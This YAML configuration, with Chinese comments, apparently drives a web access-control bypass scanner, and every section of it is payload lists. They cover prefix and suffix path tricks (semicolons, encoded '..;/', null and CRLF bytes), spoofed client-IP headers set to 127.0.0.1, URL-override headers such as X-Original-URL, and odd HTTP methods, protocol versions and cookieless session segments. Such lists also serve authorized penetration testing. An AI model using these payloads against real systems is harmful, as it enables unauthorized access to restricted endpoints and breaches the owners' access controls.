payload:
  # 允许访问的路径
  ALLOWED_ACCESS_PATHS:
    - '/api/'
    - '/static/'
  # 前缀绕过
  PREFIX_PAYLOAD:
    - '//'
    - '/.'
    - '/;'
    - '/.;'
    - '/..%00'
    - '/..%0d'
    - '/..%5c'
    - '/api;/..'
  # 后缀绕过
  SUFFIX_PAYLOAD:
    - ';.ico'
    - ';.css'
    - ';.html'
    - ';.js'
    - ';.json'
    - ';.css.jsp'
    - ';.js.jsp'
    - ';/'
    - ';%09'
    - ';%09..;'
    - ';%2f..'
    - '??'
    - '???'
    - '?debug=true'
    - '.'
    - '..;'
    - '..;/'
    - '.././'
    - '..%00/'
    - '..%0d/'
    - '..%2f'
    - '..%ff/'
    - '%2e/'
    - '%20/'
    - '.css'
    - '.html'
    - '.js'
    - '.json'
    - '/'
    - '/.'
    - '/..'
    - '/..;/'
    - '/./'
    - '/*'
    - '#'
    - '%00'
    - '%09'
    - '%0a'
    - '%0d'
    - '%20'
    - '%23'
    - '%26'
    - '%2e'
    - '%2f'
    - '%3f'
    - '%5c'
    - '~'
  AFTER_HIERARCHY_PATH:
    - ';'
    - '%3b'
    - '.'
    - '/'
    - '.;'
    - '..;'
    - '...;'
  BETWEEN_HIERARCHY_PATH:
    - ';'
    - '.'
    - '.;'
    - '..;'
    - '...;'
  # 请勿随意更改
  DIRECTORY_TRAVERSAL_SYMBOLS:
    - '..'
    - '...'
    - '..;'
    - '...;'
  DEFAULT_ADD_HEADERS_NUM: 10
  FAKE_IP_HEADERS:
    - X-ProxyUser-Ip
    - Client-IP
    - X-Originating-IP
    - X-Forwarded-For
    - X-Remote-IP
    - X-Remote-Addr
    - X-Real-IP
    - X-Custom-IP-Authorization
    - X-Host
    - X-Client-IP
    - X-Forwared-Host
    - X-Http-Destinationurl
    - Proxy-Host
    - Request-Uri
    - X-Forwarded-By
    - X-Forwarded
    - X-Forwarded-For-Original
    - X-Forwarded-Server
    - X-Forwarder-For
    - X-Forward-For
    - X-Forwarded-Proto
    - Base-Url
    - Http-Url
    - Proxy-Url
    - Real-Ip
    - Referer
    - Referrer
    - Refferer
    - X-Original-Remote-Addr
    - X-Original-Url
    - X-Proxy-Url
    - X-Rewrite-Url
    - Forwarded
    - Forwarded-For
    - Forwarded-For-Ip
    - True-Client-IP
    - X-Forwarded-Host
    - X-HTTP-Host-Override
    - X-Requested-By
    - X-Requested-For
    - X-Trusted-IP
    - Akamai-Client-Ip
  FAKE_PATH_HEADERS:
    - X-Rewrite-URL
    - X-Original-URL
    - X-Forwarded-Path
    - X-Proxy-Url
    - Http-Url
    - Proxy-Url
    - Base-Url
    - Url
    - Uri
  # 暂不支持数组形式
  FAKE_IP: 127.0.0.1
  METHODS:
    - TOGGLE_METHOD
    - HEAD
    - PUT
    - PATCH
    - TRACE
  PROTOCOLS:
    - HTTP/1.0
    - HTTP/0.9
  COOKIELESS:
    - /(S(X))
    - /(S(X))/(S(X))